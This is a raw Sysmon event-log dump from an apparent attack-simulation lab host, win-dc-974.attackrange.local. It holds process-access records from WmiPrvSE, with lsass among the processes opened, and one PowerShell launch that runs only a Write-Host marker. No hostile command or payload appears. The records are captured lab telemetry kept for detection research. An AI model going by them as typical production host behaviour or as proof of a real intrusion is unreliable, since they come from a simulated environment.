16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6DAB-603E-BAAA-00000000AD01}78689812C:\Windows\system32\conhost.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-BAAA-00000000AD01}7868C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002240274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_oto3wg0j.spm.ps12021-03-02 16:54:03.275 10341000x80000000000000002240273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002240268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.279{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Comm Write-Host dcceaabe-9bb1-4229-ba60-8b6c45dc83b8C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002240267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.275{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B8AA-00000000AD01}12596C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 